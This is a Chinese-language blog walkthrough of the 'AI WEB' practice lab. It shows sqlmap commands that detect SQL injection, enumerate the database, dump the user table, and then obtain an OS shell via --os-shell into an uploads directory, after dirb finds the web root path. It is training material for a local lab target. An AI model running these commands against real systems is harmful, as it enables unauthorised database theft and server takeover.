AI WEB 靶场(工具版)

一.查找robots.txt文件

用御剑扫描靶场ip,我们发现了robots.txt

我们在去网站访问一下robots.txt,然后再每个目录都访问一下

当我们访问到se3reTdir777的时候,会出现这个提交窗口

二.sql注入(工具)

所用工具:

(1)kali操作系统,或者在windows端部署python环境安装sqlmap工具

在kali操作系统中打开终端输入sqlmap,看有没有这个工具,如果没有安装一下,输入apt install sqlmap就会安装成功。

(2)burp suite抓包代理工具

1.查看网站是否有sql注入

用burp suite抓靶场网址http://192.168.95.136/se3reTdir777/的包

将红框中的内容复制,创建一个新的文件1.txt,将数据包放在文件中,上传到kali中

在文件的目录打开终端

输入sqlmap -r 1.txt这个是检查是否有sql注入的

我们看到下面这个就成功了,说明有sql注入

2.查询数据库名

输入sqlmap -r 1.txt --dbs

结果,库名为:aiweb1

3.查询表名

输入sqlmap -r 1.txt -D aiweb1 --tables

(-D:数据库,aiweb1:数据库名)

结果为user和systemUser,我们在查询user表

4.查询列名

输入sqlmap -r 1.txt -D aiweb1 -T user --columns --batch

(-D:数据库,aiweb1:数据库名)(-T:数据表,user:表名)

结果为下图,firstName,id,lastName

5.查询数据

将users表中数据dump下来(谨慎操作)

注:请勿用dump用于练习靶场之外

输入sqlmap -r 1.txt -D aiweb1 -T user --dump --batch

上面的图中红框引号就是他的路径,我们去查看一下,

6.找到绝对路径

用dirb工具

在kali终端输入dirb http://192.168.95.136/m3diNf0/

这样我们就跑出了一个info.php文档

去浏览器上打开就可以找到绝对路径

7.获取OS-shell功能

回到原目录输入slqmap -r 1.txt --os-shell

在输入4,回车

在输入2,回车

在下面输入绝对路径加上/se3reTdir777/uploads/

输入/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

回车

这个位置就是上传文件的网址路径,去复制访问

在这里我们就可以上传文件了

以上就是ai web靶场的通关攻略SQL

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值